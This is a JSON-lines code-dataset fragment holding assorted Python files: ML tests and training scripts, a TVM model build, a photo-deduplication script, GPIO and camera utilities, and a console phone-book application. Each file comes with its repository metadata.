NTASGDSchedulerTest(AllenNlpTestCase):\n def setUp(self):\n self.dim = 10\n self.model = torch.nn.Linear(10, 10)\n self.optim = NTASGDOptimizer(self.model.parameters(),\n lr=30.0,\n weight_decay=1.2e-6)\n self.scheduler = NTASGDScheduler(optimizer=self.optim,\n non_monotone_interval=3)\n super().setUp()\n\n def test_scheduler_does_not_trigger_early(self):\n assert not self.optim.triggered\n self.scheduler.step(0.0, 0)\n self.scheduler.step(0.1, 1)\n self.scheduler.step(0.2, 2)\n assert not self.optim.triggered\n\n def test_scheduler_does_not_trigger_if_always_improving(self):\n assert not self.optim.triggered\n self.scheduler.step(10, 0)\n self.scheduler.step(9, 1)\n self.scheduler.step(8, 2)\n self.scheduler.step(7, 3)\n self.scheduler.step(6, 4)\n self.scheduler.step(5, 5)\n self.scheduler.step(4, 6)\n assert not self.optim.triggered\n\n def test_scheduler_does_trigger_when_expected(self):\n assert not self.optim.triggered\n self.scheduler.step(10, 0)\n self.scheduler.step(9, 1)\n self.scheduler.step(8, 2)\n self.scheduler.step(7, 3)\n self.scheduler.step(11, 4)\n assert self.optim.triggered\n","repo_name":"rloganiv/kglm-model","sub_path":"kglm/tests/training/nt_asgd_test.py","file_name":"nt_asgd_test.py","file_ext":"py","file_size_in_byte":3273,"program_lang":"python","lang":"en","doc_type":"code","stars":111,"dataset":"github-code","pt":"53"} +{"seq_id":"26966398589","text":"'''\n下载的图片其他地方可能已经有备份了(比如NAS、WebDAV)\n这里遍历所有图片,如果有重复的,就删除\n之后再手动备份上去\n'''\n\nimport os\nimport filecmp\n\nlibrary_path = \"P:/wxy\" # 被检测的文件夹\nreduct_path = \"G:/设备备份/谷歌TakeOut/相册1\" # 去重的文件夹\n\ntotal_count = 0\n\nall_files = [] # 仅保存文件名,用于快速匹配\nall_paths = [] # 完整路径,用于确认重复文件\n\n'''\n在备份的照片库中获取所有已有的照片\n可以是WebDAV等网络文件夹,速度应该不会太慢\n'''\ndef loopAllFiles(base_dir):\n # 遍历所有文件夹\n file_list = os.listdir(base_dir)\n for file in file_list:\n cur_path = os.path.join(base_dir, file)\n if os.path.isdir(cur_path):\n # 遍历子文件夹\n loopAllFiles(cur_path)\n else:\n if file.endswith(\".json\"):\n continue\n else:\n all_files.append(file)\n all_paths.append(cur_path)\n\n\n'''\n将照片一一比对,如果有重复的,就删除\n'''\ndef detectSameFile(path):\n file_name = os.path.basename(path)\n if file_name in all_files:\n # 重复的文件\n index = all_files.index(file_name)\n full_path = all_paths[index]\n # if filecmp.cmp(path, full_path, shallow=True):\n print(total_count, \"重复的文件:\", path, \" -> \", all_paths[index])\n os.remove(path)\n\n'''\n遍历目标文件夹,获取所有目标文件\n'''\ndef loopTargetFiles(base_dir):\n global total_count\n # 遍历所有文件夹\n file_list = os.listdir(base_dir)\n for file in file_list:\n cur_path = os.path.join(base_dir, file)\n if os.path.isdir(cur_path):\n # 遍历子文件夹\n loopTargetFiles(cur_path)\n else:\n if file.endswith(\".json\"):\n continue\n else:\n detectSameFile(cur_path)\n # print(total_count, cur_path)\n total_count = total_count + 1\n\n\nif __name__ == \"__main__\":\n loopAllFiles(library_path)\n print('待匹配文件数量:', len(all_files))\n loopTargetFiles(reduct_path)\n\n","repo_name":"iwxyi/GooglePhotoProcess","sub_path":"remove_same.py","file_name":"remove_same.py","file_ext":"py","file_size_in_byte":2194,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13117121888","text":"# coding:utf-8\n\nimport torch\nimport os\nimport argparse\nimport json\nfrom setproctitle import setproctitle\n\nfrom learn.network.network import make_pvnetwork\n\ndevice = \"cuda\"\n\nparser = argparse.ArgumentParser(description=\"強化学習の初期化を行う\")\nparser.add_argument(\"--proc_name\", type=str,\n default=\"UTTT\", help=\"プロセスの名前\")\nparser.add_argument(\"--output_path\", type=str,\n default=\"./RL_output\", help=\"学習に使うディレクトリ\")\nparser.add_argument(\"--bin_num\", type=int,\n default=10, help=\"学習データを分けるディレクトリの数\")\nparser.add_argument(\"--init_model\", type=str,\n default=None, help=\"学習の初期状態\") \nargs = parser.parse_args()\n\nsetproctitle(f\"{args.proc_name}_initialize\")\n\n# ディレクトリを作成する\nos.makedirs(args.output_path, exist_ok=False)\nos.makedirs(os.path.join(args.output_path, \"models\"), exist_ok=True)\nos.makedirs(os.path.join(args.output_path, \"logs\"), exist_ok=True)\n\nsavedata = {\"epoch\": 0}\n\n# モデルの初期状態を作成する\nmodel_path = os.path.join(args.output_path, \"models\")\nos.makedirs(model_path, exist_ok=True)\nmodel = make_pvnetwork()\nmodel = model.to(device)\nif args.init_model is not None:\n model.load_state_dict(torch.load(args.init_model), strict=False)\n\ntorch.save(model.state_dict(), os.path.join(model_path, \"state_0.pth\"))\n\n# 対戦データを入れるディレクトリを作成する\nfor idx in range(args.bin_num):\n bin_path = os.path.join(args.output_path, f\"data/data_{idx}\")\n os.makedirs(bin_path)\n\nwith open(os.path.join(args.output_path, \"savedata.json\"), mode=\"w\") as f:\n json.dump(savedata, f)\n","repo_name":"takeo1116/UTTTGame","sub_path":"learn/reinforcement/initialize.py","file_name":"initialize.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"ja","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"38725311263","text":"\"\"\"Main class, holding information about models and training/testing routines.\"\"\"\n\nimport torch\nfrom ..consts import BENCHMARK\nfrom ..utils import cw_loss, reverse_xent_avg\nimport pdb\ntorch.backends.cudnn.benchmark = BENCHMARK\n\nfrom .forgemaster_base import _Forgemaster\n\nclass ForgemasterUntargeted(_Forgemaster):\n \"\"\"Brew passenger poison with given arguments.\n\n “Double, double toil and trouble;\n Fire burn, and cauldron bubble....\n\n Round about the cauldron go;\n In the poison'd entrails throw.”\n\n \"\"\"\n\n def _define_objective(self, inputs, labels):\n \"\"\"Implement the closure here.\"\"\"\n def closure(model, criterion, optimizer, causal_model, causal_criterion):\n \"\"\"This function will be evaluated on all GPUs.\"\"\" # noqa: D401\n if not self.args.only_causal:\n outputs = model(inputs)\n loss = -criterion(outputs,labels)\n else:\n loss = 0\n\n # add causal_loss\n if self.args.causal_beta != 0:\n causal_loss = causal_criterion.run(causal_model, inputs, labels)\n loss += causal_loss\n\n loss.backward(retain_graph=self.retain)\n prediction = (outputs.data.argmax(dim=1) == labels).sum()\n return loss.detach().cpu(), prediction.detach().cpu()\n return closure\n","repo_name":"Thinklab-SJTU/DICE","sub_path":"poison/village/shop/forgemaster_untargeted_w_causal.py","file_name":"forgemaster_untargeted_w_causal.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"18228665268","text":"# Здесь можно создать различные интерфейсы\n# По ТЗ сделан только консольный интерфейс\n\nimport os\nfrom typing import List, Callable\nfrom abc import ABC, abstractmethod\n\n\n\n\nfrom rich.console import Console\nfrom rich.table import Table\nfrom rich.prompt import Prompt, Confirm\nfrom rich.text import Text\n\n\nfrom .db.strategies import DataBaseStrategy\nfrom .services import ContactsService\nfrom .schemas import Contact\n\n\n\nclass ContactsAbstractInterface(ABC):\n pass\n\n\nclass Status:\n def __init__(self) -> None:\n self.style = \"\"\n self.text = \"\"\n\n def update(self, text:str, danger:bool = False) -> None:\n self.text = \"Status: \"+text\n if danger:\n self.style = \"red\"\n else:\n self.style = \"green\"\n\n def reset(self) -> None:\n self.text = \"\"\n self.style = \"\"\n\nclass ContactsConsoleInterface(ContactsAbstractInterface):\n def __init__(self, contacts_per_page: int = None) -> None:\n \"\"\"\n @param\n contacts_per_page - If not defined, it is calculated automatically.\n \"\"\"\n self.service = ContactsService()\n self.on_startup()\n self.console = Console(force_interactive=True)\n\n self.console.print(\"PhoneBook | Your guide to the world of contacts\")\n\n\n # buttons\n\n self.buttons = {\n 'prev': {\n 'sym':'p', \n 'text':'Prev page'\n },\n 'next': {\n 'sym':'n', \n 'text':'Next page'\n },\n 'add_contact': {\n 'sym':'a',\n 'text':'Add contact'\n },\n 'find_contact': {\n 'sym':'f',\n 'text':'Find contact'\n },\n 'exit': {\n 'sym':'x',\n 'text':'Exit (or Ctrl+C)'\n },\n 'search_panel': {\n 'sym':'s',\n 'text':'Exit search panel'\n }\n }\n\n self.prev_button = self.get_stylized_menu_button(button=self.buttons['prev'])\n self.prev_button__inactive = self.get_stylized_menu_button(button=self.buttons['prev'], inactive=True)\n \n self.next_button = self.get_stylized_menu_button(button=self.buttons['next'])\n self.next_button__inactive = self.get_stylized_menu_button(button=self.buttons['next'], inactive=True)\n\n self.add_contact_button = self.get_stylized_menu_button(button=self.buttons['add_contact'])\n\n self.search_panel_disable_button = self.get_stylized_menu_button(button=self.buttons['search_panel'])\n\n self.find_contact_button = self.get_stylized_menu_button(button=self.buttons['find_contact'])\n self.find_contact_button__inactive = self.get_stylized_menu_button(button=self.buttons['find_contact'], inactive=True)\n\n self.exit_button = self.get_stylized_menu_button(button=self.buttons['exit'], danger=True)\n\n\n # vars\n\n self.page:List[Contact] = []\n self.page_num = 1\n self.next = False\n self.prev = False\n \n self.search_panel_enabled = False\n self.search_panel_page:List[Contact] = []\n self.search_panel_contacts:List[Contact] = []\n self.search_panel_next = False\n self.search_panel_prev = False\n self.search_panel_page_num = 1\n\n self.not_work = False\n self.status = Status()\n self.empty_contacts = self.are_the_contacts_empty()\n\n # adaptive\n \n self.columns, self.lines = self.get_terminal_size()\n if contacts_per_page is None:\n self.service.NUM_OF_CONTACTS_PER_PAGE = self.calc_num_contacts_per_page()\n self.contacts_per_page_calc_auto = True\n else:\n self.service.NUM_OF_CONTACTS_PER_PAGE = contacts_per_page\n self.contacts_per_page_calc_auto = False\n\n if self.columns <= 84 or self.lines <= 10:\n self.console.print(f\"Error! With this resolution of the console, the program cannot run. Set console size. We highly recommend ({84}<,{30}<)\", style='red')\n self.not_work = True\n\n\n\n\n # Events\n\n def loop(self) -> None:\n loop = True\n while loop and not self.not_work:\n try:\n ch = self.main_menu()\n\n if ch in [self.buttons['exit']['sym'],self.buttons['exit']['sym'].upper()]:\n loop = False\n\n elif ch in [self.buttons['add_contact']['sym'],self.buttons['add_contact']['sym'].upper()]:\n self.add_contact_menu()\n\n elif ch in [self.buttons['find_contact']['sym'],self.buttons['find_contact']['sym'].upper()] and not self.empty_contacts:\n self.find_contact_menu()\n\n elif ch in [self.buttons['prev']['sym'],self.buttons['prev']['sym'].upper()]:\n if self.search_panel_enabled:\n if self.search_panel_prev:\n self.search_panel_page_num -= 1\n else:\n if self.prev:\n self.page_num -= 1\n\n elif ch in [self.buttons['next']['sym'],self.buttons['next']['sym'].upper()]:\n if self.search_panel_enabled:\n if self.search_panel_next:\n self.search_panel_page_num += 1\n else:\n if self.next:\n self.page_num += 1\n\n elif ch in [self.buttons['search_panel']['sym'],self.buttons['search_panel']['sym'].upper()]:\n self.search_panel_enabled = False\n self.search_pane_page_num = 1\n self.search_panel_page = []\n self.search_panel_contacts = []\n\n elif 'del' in ch and not self.empty_contacts:\n ch = ch.replace('del', '')\n try:\n ch = int(ch)\n except ValueError:\n continue\n if ch in [int(i) for i in range(1, len(self.page)+1)]:\n self.delete_contact_menu(ch)\n\n elif ch in [str(i) for i in range(1, len(self.page)+1)] and not self.empty_contacts:\n try:\n ch = int(ch)\n except ValueError:\n continue\n self.edit_contact_menu(ch)\n except KeyboardInterrupt:\n loop = False\n self.on_shutdown()\n\n def on_startup(self):\n self.service.on_startup()\n def on_shutdown(self):\n self.service.on_shutdown()\n\n\n \n # Menu\n\n def main_menu(self) -> str:\n self.clear_screen()\n # page:List[Contact] = []\n if self.search_panel_enabled:\n page, prev, next = self.service.pagination(self.search_panel_page_num, self.search_panel_contacts)\n self.search_panel_page = page\n self.search_panel_next = next\n self.search_panel_prev = prev\n else:\n page, prev, next = self.service.pagination(self.page_num)\n self.page = page\n self.next = next\n self.prev = prev\n self.print_page(page)\n\n divider = self.service.NUM_OF_CONTACTS_PER_PAGE - len(page) \n for i in range(divider * 2):\n self.console.print()\n \n if not self.empty_contacts:\n self.console.print(f\"Enter a contact number to [cyan]edit[/cyan] it (1-{len(page)}), when adding [red]'del'[/red] keyword removes it\", markup=True)\n if self.search_panel_enabled:\n self.console.print(f\"Or enter the symbol of the search panel menu item {self.search_panel_page_num}\")\n else:\n self.console.print(\"Or enter the symbol of the menu item\")\n else:\n self.console.print(\"Oops, no contacts yet :(\")\n self.console.print(\"Create your first contact by entering the keyword [green]'a'[/green]\", markup=True)\n self.console.print(self.status.text, style=self.status.style)\n self.status.reset()\n\n # menu\n\n if prev:\n self.console.print(self.prev_button)\n else:\n self.console.print(self.prev_button__inactive)\n\n if next:\n self.console.print(self.next_button)\n else:\n self.console.print(self.next_button__inactive)\n\n if not self.empty_contacts:\n self.console.print(self.find_contact_button)\n else:\n self.console.print(self.find_contact_button__inactive)\n\n if self.search_panel_enabled:\n self.console.print(self.search_panel_disable_button)\n else:\n self.console.print(self.add_contact_button)\n\n self.console.print(self.exit_button)\n\n return input(\" : \")\n \n def add_contact_menu(self, contact: Contact = None) -> None:\n self.clear_screen()\n self.console.print(\"# Add contact menu\")\n confirm = Confirm.ask(\"Are you sure you want to create a contact?\", default='y')\n if not confirm:\n return None\n if contact is not None:\n first_name = Prompt.ask(\"Enter first name\", default=contact.first_name)\n middle_name = Prompt.ask(\"Enter middle name\", default=contact.middle_name)\n last_name = Prompt.ask(\"Enter last name\", default=contact.last_name)\n company = Prompt.ask(\"Enter company name\", default=contact.company)\n work_phone = Prompt.ask(\"Enter work phone\", default=contact.work_phone)\n personal_phone = Prompt.ask(\"Enter personal phone\", default=contact.personal_phone)\n else:\n first_name = Prompt.ask(\"Enter first name\")\n middle_name = Prompt.ask(\"Enter middle name\")\n last_name = Prompt.ask(\"Enter last name\")\n company = Prompt.ask(\"Enter company name\")\n work_phone = Prompt.ask(\"Enter work phone\")\n personal_phone = Prompt.ask(\"Enter personal phone\")\n contact = Contact(\n first_name=first_name,\n middle_name=middle_name,\n last_name=last_name,\n company=company,\n work_phone=work_phone,\n personal_phone=personal_phone\n )\n self.console.print(contact)\n confirm = Confirm.ask(\"All OK? Save?\")\n if not confirm:\n contact = self.add_contact_menu(contact)\n return None\n if contact is not None:\n self.service.add(contact)\n self.empty_contacts = self.are_the_contacts_empty()\n self.status.update(\"Contact added!\")\n if self.contacts_per_page_calc_auto:\n self.service.NUM_OF_CONTACTS_PER_PAGE = self.calc_num_contacts_per_page()\n else:\n self.status.update(\"Contact not added!\", danger=True)\n\n def edit_contact_menu(self, ch:int) -> None:\n self.clear_screen()\n if self.search_panel_enabled:\n contact = self.search_panel_page[ch-1]\n else:\n contact = self.page[ch-1]\n\n confirm = Confirm.ask(\"Are you sure you want to edit this contact?\", default='y')\n if not confirm:\n self.status.update(\"Contact not edited!\", danger=True)\n return None\n \n first_name = Prompt.ask(\"Enter first name\", default=contact.first_name)\n middle_name = Prompt.ask(\"Enter middle name\", default=contact.middle_name)\n last_name = Prompt.ask(\"Enter last name\", default=contact.last_name)\n company = Prompt.ask(\"Enter company name\", default=contact.company)\n work_phone = Prompt.ask(\"Enter work phone\", default=contact.work_phone)\n personal_phone = Prompt.ask(\"Enter personal phone\", default=contact.personal_phone)\n\n contact.first_name=first_name\n contact.middle_name=middle_name\n contact.last_name=last_name\n contact.company=company\n contact.work_phone=work_phone\n contact.personal_phone=personal_phone\n\n self.status.update(\"Contact edited!\")\n\n def delete_contact_menu(self, nums : int | List[int]) -> None:\n self.clear_screen()\n if isinstance(nums, int):\n if self.search_panel_enabled:\n contact = self.search_panel_page[nums-1]\n else:\n contact = self.page[nums-1]\n self.console.print(contact)\n confirm = Confirm.ask(f\"Are you sure you want to delete this contact?\")\n if confirm:\n self.service.delete(contact)\n self.status.update(\"Contact deleted!\", danger=True)\n self.empty_contacts = self.are_the_contacts_empty()\n if self.contacts_per_page_calc_auto:\n self.service.NUM_OF_CONTACTS_PER_PAGE = self.calc_num_contacts_per_page()\n else:\n # TODO Сделать в будущем функцию для удаления множества контактов одной командой (Перечисление их номеров)\n confirm = Confirm.ask(\"Are you sure you to delete this contacts?\")\n\n\n def find_contact_menu(self):\n self.clear_screen()\n query = Prompt.ask(\"Enter name, company or phone number\")\n contacts = self.service.find(query)\n self.console.print(contacts)\n if contacts:\n self.search_panel_contacts = contacts\n self.search_panel_enabled = True\n self.status.update(\"Here is what you found for your query!\")\n else:\n self.status.update(\"Nothing found for your query!\", danger=True)\n\n\n # Utils\n def are_the_contacts_empty(self):\n if len(self.service.get_all()) == 0:\n self.search_panel_enabled = False\n return True\n return False\n\n def clear_screen(self):\n os.system('cls')\n\n def get_terminal_size(self) -> tuple[int,int]:\n return os.get_terminal_size()\n\n def calc_num_contacts_per_page(self) -> int:\n lines = self.lines - 11 # Строки занимающие грани таблицы и пункты меню\n return min(lines // 2, len(self.service.get_all()))\n\n def get_stylized_menu_button(self, button: dict, inactive: bool = False, danger: bool = False) -> Text:\n stylized_button = Text()\n if inactive:\n sym_style = \"bold #222222\"\n text_style = \"#222222\"\n else:\n sym_style = \"bold blue\"\n text_style = \"\"\n if danger:\n sym_style = \"bold red\"\n text_style = \"red\"\n stylized_button.append('|'+button['sym']+'|', style=sym_style)\n stylized_button.append(' '+button['text'], style=text_style)\n return stylized_button\n\n def print_page(self, contacts_list:List[Contact]) -> None:\n table = Table(show_lines=True, expand=True)\n table.add_column(\"№\", style=\"green\", no_wrap=True, min_width=1)\n table.add_column(\"First name\", style=\"cyan\", no_wrap=True, max_width=12)\n table.add_column(\"Middle name\", style=\"green\", no_wrap=True, max_width=12)\n table.add_column(\"Last name\", style=\"cyan\", no_wrap=True, max_width=12)\n table.add_column(\"Company\", style=\"green\", no_wrap=True, max_width=12)\n table.add_column(\"Work phone\", style=\"cyan\", no_wrap=True, max_width=12)\n table.add_column(\"Personal phone\", style=\"green\", no_wrap=True, max_width=12)\n\n for n, i in enumerate(contacts_list):\n table.add_row(str(n+1), i.first_name, i.middle_name, i.last_name, i.company, i.work_phone, i.personal_phone)\n\n self.console.print(table)\n","repo_name":"sumrak10/PhoneBook","sub_path":"PhoneBook/interfaces.py","file_name":"interfaces.py","file_ext":"py","file_size_in_byte":15697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1057948731","text":"def solution(begin, target, words):\n answer = 0\n \n if target in words:\n idx_info = []\n for i in range(len(begin)):\n if begin[i] != target[i]:\n idx_info.append(i)\n \n print(idx_info)\n \n words.remove(target)\n \n for i in idx_info:\n for word in words:\n tmp = begin\n \n if tmp[i] != word[i] and target[i] == word[i]:\n tmp = tmp[:i] + word[i] + tmp[i + 1:]\n print(\"tmp: \", tmp)\n \n if tmp == word:\n words.remove(word)\n answer += 1\n begin = tmp\n \n return answer\n\nprint(solution(\"hit\", \"cog\", [\"hot\", \"dot\", \"dog\", \"lot\", \"log\", \"cog\"]))","repo_name":"hydenny/coding-test-practice","sub_path":"프로그래머스/Untitled-1.py","file_name":"Untitled-1.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28347495767","text":"import os\nfrom PIL import Image\nfrom glob import glob\nimport tensorflow as tf\nimport numpy as np\nfrom tensorflow.contrib.learn.python.learn.datasets.mnist import read_data_sets\n\n\ndef load_dataset(data_path, batch_size, scale_size, split=None, is_grayscale=False, seed=None):\n dataset_name = os.path.basename(data_path)\n if dataset_name in ['CelebA'] and split:\n data_path = os.path.join(data_path, 'splits', split)\n elif dataset_name in ['RenderBall', 'RenderBallTri']:\n data_path = data_path\n else:\n is_grayscale = True\n raise Exception('[!] Caution! Unknown dataset name.')\n\n paths = []\n tf_decode = tf.image.decode_jpeg\n for ext in [\"jpg\", \"png\"]:\n paths = glob(\"{}/*.{}\".format(data_path, ext))\n\n if ext == 'png':\n tf_decode = tf.image.decode_png\n\n if len(paths) != 0:\n break\n\n with Image.open(paths[0]) as img:\n w, h = img.size\n shape = [h, w, 3]\n\n filename_queue = tf.train.string_input_producer(list(paths), shuffle=False, seed=seed)\n reader = tf.WholeFileReader()\n filename, data = reader.read(filename_queue)\n image = tf_decode(data, channels=3)\n\n if is_grayscale:\n image = tf.image.rgb_to_grayscale(image)\n shape = [h, w, 1]\n image.set_shape(shape)\n\n min_after_dequeue = 5000\n capacity = min_after_dequeue + 3 * batch_size\n\n queue = tf.train.shuffle_batch(\n [image], batch_size=batch_size,\n num_threads=4, capacity=capacity,\n min_after_dequeue=min_after_dequeue, name='synthetic_inputs')\n\n if dataset_name in ['CelebA']:\n queue = tf.image.crop_to_bounding_box(queue, 50, 25, 128, 128)\n queue = tf.image.resize_nearest_neighbor(queue, [scale_size, scale_size])\n else:\n queue = tf.image.resize_nearest_neighbor(queue, [scale_size, scale_size])\n\n return tf.to_float(queue)\n\n\ndef load_mnist(data_path):\n mnist_data = read_data_sets(data_path, one_hot=True)\n\n return mnist_data\n\n\ndef generate_gmm_circle_data(num_data=50000, dim=2, num_cluster=8, scale=4, var=0.02):\n means_x = np.array([scale * np.cos(i * 2 * np.pi / num_cluster) for i in range(num_cluster)])\n means_y = np.array([scale * np.sin(i * 2 * np.pi / num_cluster) for i in range(num_cluster)])\n means = np.vstack((means_x, means_y)).transpose()\n # print means\n std = np.array([var] * num_cluster).transpose()\n weights = np.array([1. / num_cluster] * num_cluster).transpose()\n if num_cluster == 2:\n weights = np.array([2./3, 1./3])\n\n data = np.zeros([num_data, 2], dtype=np.float32)\n clusters = np.zeros([num_data, ], dtype=np.float32)\n for i in range(data.shape[0]):\n cluster = np.random.choice(range(num_cluster), p=weights)\n sample = np.random.multivariate_normal(mean=means[cluster].flatten(),\n cov=np.identity(2) * std[cluster])\n data[i] = sample.transpose()\n clusters[i] = cluster\n\n data = np.clip(data, -3 * scale, 3 * scale)\n\n return data, means\n\n\ndef batch_gmm_gen(data, batch_size):\n while True:\n np.random.shuffle(data)\n for i in range(0, len(data) - batch_size + 1, batch_size):\n yield data[i:i + batch_size]\n\n","repo_name":"weilinie/Understand-GAN","sub_path":"img_helpers.py","file_name":"img_helpers.py","file_ext":"py","file_size_in_byte":3241,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"29854565572","text":"import cv2\n\npath = \"./image/pic_test.jpg\"\n\ndef take_pic(): \n cap = cv2.VideoCapture(0)\n ret, frame = cap.read()\n cv2.imshow('frame', frame)\n # key = cv2.waitKey(1)\n cv2.imwrite(path, frame)\n cap.release()\n cv2.destroyAllWindows()\n\n# take_pic()\n","repo_name":"KanNa-max/SmartLock_QR","sub_path":"code/module/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25841260360","text":"######################################################################\n# Utils for downloading and extracting zip files\n# ---------------------------------------------\nimport os\nimport tvm\nfrom tvm import relay\nfrom tvm.relay import transform as _transform\nimport numpy as np\n\ndef extract(path):\n import tarfile\n if path.endswith(\"tgz\") or path.endswith(\"gz\"):\n dir_path = os.path.dirname(path)\n tar = tarfile.open(path)\n tar.extractall(path=dir_path)\n tar.close()\n else:\n raise RuntimeError('Could not decompress the file: ' + path)\n\n######################################################################\n# Load pretrained TFLite model\n# ---------------------------------------------\n# we load mobilenet V1 TFLite model provided by Google\nfrom tvm.contrib.download import download_testdata\n\nmodel_url = \"https://storage.googleapis.com/download.tensorflow.org/models/mobilenet_v1_2018_08_02/mobilenet_v1_1.0_224_quant.tgz\"\n\n# we download model tar file and extract, finally get tflite file\nmodel_path = download_testdata(model_url, \"mobilenet_v1_1.0_224_quant.tgz\", module=['tf', 'official'])\nmodel_dir = os.path.dirname(model_path)\nextract(model_path)\n\n# now we have mobilenet_v1_1.0_224_quant.tflite on disk and open it\ntflite_model_file = os.path.join(model_dir, \"mobilenet_v1_1.0_224_quant.tflite\")\ntflite_model_buf = open(tflite_model_file, \"rb\").read()\n\n# get TFLite model from buffer\nfrom tflite.Model import Model # edit here\ntflite_model = Model.GetRootAsModel(tflite_model_buf, 0)\n\n#######################################################################\n# Generic run functions for TVM & TFLite\n# --------------------------------------\ntarget = tvm.target.riscv_cpu(\"spike\")\ninput_tensor = \"input\"\ninput_shape = (1, 224, 224, 3)\ninput_dtype = \"uint8\"\n\n# Parse TFLite model and convert it to a Relay module\nmod, params = relay.frontend.from_tflite(tflite_model,\n shape_dict={input_tensor: input_shape},\n dtype_dict={input_tensor: input_dtype})\n\n\"\"\" tensorize flow\n call FTVMQnnLegalize() & FTVMQnnCanonicalize for QNN utilty\n call ConvertLayout() to convert conv2d layout from NHWC to NCHW\n call Legalize() to adding pad to conv2d for match the axis (Input channel : as mutiple of 4 / Output channel : as multiple of 16 )\n call AlterOpLaout() to convert conv2d into conv2d_int8\n\"\"\"\nprint('qnn_mod before : ', mod)\nseq = tvm.transform.Sequential([\n relay.transform.Legalize('FTVMQnnLegalize'),\n relay.transform.Legalize('FTVMQnnCanonicalize'),\n relay.transform.ConvertLayout({'nn.conv2d': ['NCHW', 'OIHW']}),\n relay.transform.Legalize(),\n relay.transform.AlterOpLayout(),\n])\nwith tvm.transform.PassContext(opt_level=3):\n with tvm.target.create(target):\n mod = seq(mod)\nprint('qnn_mod after : ', mod)\n# --------------------------------------------------------------\n\n# opt pass\nfrom tvm.relay.quantize.quantize import _bind_params\noptimize = tvm.transform.Sequential([relay.transform.SimplifyInference(),\n relay.transform.FoldConstant(),\n relay.transform.FoldScaleAxis(),\n relay.transform.CanonicalizeOps(),\n relay.transform.FoldConstant()])\nmod['main'] = _bind_params(mod['main'], params)\nwith tvm.transform.PassContext(opt_level=3):\n mod = optimize(mod)\nprint('opt mod : ', mod)\n\n# --------------------------------------------------------------\n\n\nwith relay.build_config(opt_level=0):\n module = relay.build(mod, target, params=params)\n\nlib, graph, params = module.get_lib(), module.get_json(), module.get_params()\n\ntarget_dir, model_name = '.', 'mobilenet'\n\nwith open(target_dir + '/' + model_name + '.ll', 'w') as _f:\n _f.write(lib.get_source())\nwith open(target_dir + '/' + model_name + '.graph', 'w') as _f:\n _f.write(graph)\nwith open(target_dir + '/' + model_name + '.params', 'wb') as _f:\n _f.write(relay.save_param_dict(params))\nprint(\"save finish\")\n","repo_name":"nthu-pllab/RISCV-DLR","sub_path":"example/pre_quant_mobilenet_v1_tflite/build_module.py","file_name":"build_module.py","file_ext":"py","file_size_in_byte":4097,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"73969890729","text":"from guizero import *\nfrom gpiozero import TrafficHat\nfrom threading import Thread\n\nth = TrafficHat(pwm=True)\n\napp = App(\"Traffic HAT controller\", layout=\"grid\")\n\ndef scaled(v):\n return v / 100\n\ndef update_lights():\n while True:\n yield (scaled(red.value), scaled(amber.value), scaled(green.value))\n\ndef update_button():\n while True:\n button_pressed.value = th.button.value\n button_held.value = th.button.is_held\n\nText(app, \"Lights\", grid=[0, 1])\nText(app, \"Red\", grid=[1, 0])\nred = Slider(app, start=100, end=0, grid=[1, 1], horizontal=False)\nText(app, \"Amber\", grid=[2, 0])\namber = Slider(app, start=100, end=0, grid=[2, 1], horizontal=False)\nText(app, \"Green\", grid=[3, 0])\ngreen = Slider(app, start=100, end=0, grid=[3, 1], horizontal=False)\n\nText(app, \"Buzzer\", grid=[0, 2])\nPushButton(app, command=th.buzzer.on, text=\"on\", grid=[1, 2])\nPushButton(app, command=th.buzzer.off, text=\"off\", grid=[2, 2])\nPushButton(app, command=th.buzzer.beep, text=\"beep\", grid=[3, 2])\n\nText(app, \"Button\", grid=[0, 3])\nbutton_pressed = CheckBox(app, \"Pushed\", grid=[1, 3])\nbutton_held = CheckBox(app, \"Held\", grid=[2, 3])\n\nth.lights.source = update_lights()\n\nthread = Thread(target=update_button)\nthread.start()\n\napp.display()\n","repo_name":"bennuttall/guizero-examples","sub_path":"traffic-hat/traffic_hat.py","file_name":"traffic_hat.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"72430554089","text":"import urllib.request\nimport logging\n\nlogging.basicConfig(level=logging.DEBUG)\n\ndef getApi(address):\n try:\n response = urllib.request.urlopen(address).read()\n except Exception as e:\n logging.getLogger().error(\"Unable to load data from \" + address)\n return response","repo_name":"ivandelic/oci-devops-functions-blue-green","sub_path":"functions/api-retriever/apimanager.py","file_name":"apimanager.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"8082811167","text":"#working with dates \nfrom datetime import date\nfrom datetime import time\nfrom datetime import datetime\n\ndef main():\n td = date.today()\n print(\"Today is : \", td)\n\n#print date compentes\n print(\"Date components : \",td.day, td.month, td.year)\n\n#recieve weekday \n print(\"Today weekday is \", td.weekday())\n days=[\"mon\", \"tue\",\"wed\",\"thu\",\"fri\",\"sat\",\"sun\"]\n print(\"Which is a : \", days[td.weekday()])\n\n# get todya date from datetime class\n print(\"the current time is : \", datetime.time(datetime.now()))\n\n\nif(__name__==\"__main__\"):\n main() ","repo_name":"aliJlidi/Python_basics","sub_path":"dates.py","file_name":"dates.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34864970333","text":"\"\"\"empty message\n\nRevision ID: 3b8a6ed35c7c\nRevises: 7fd63e303772\nCreate Date: 2021-03-15 23:57:16.998560\n\n\"\"\"\nfrom alembic import op\nimport 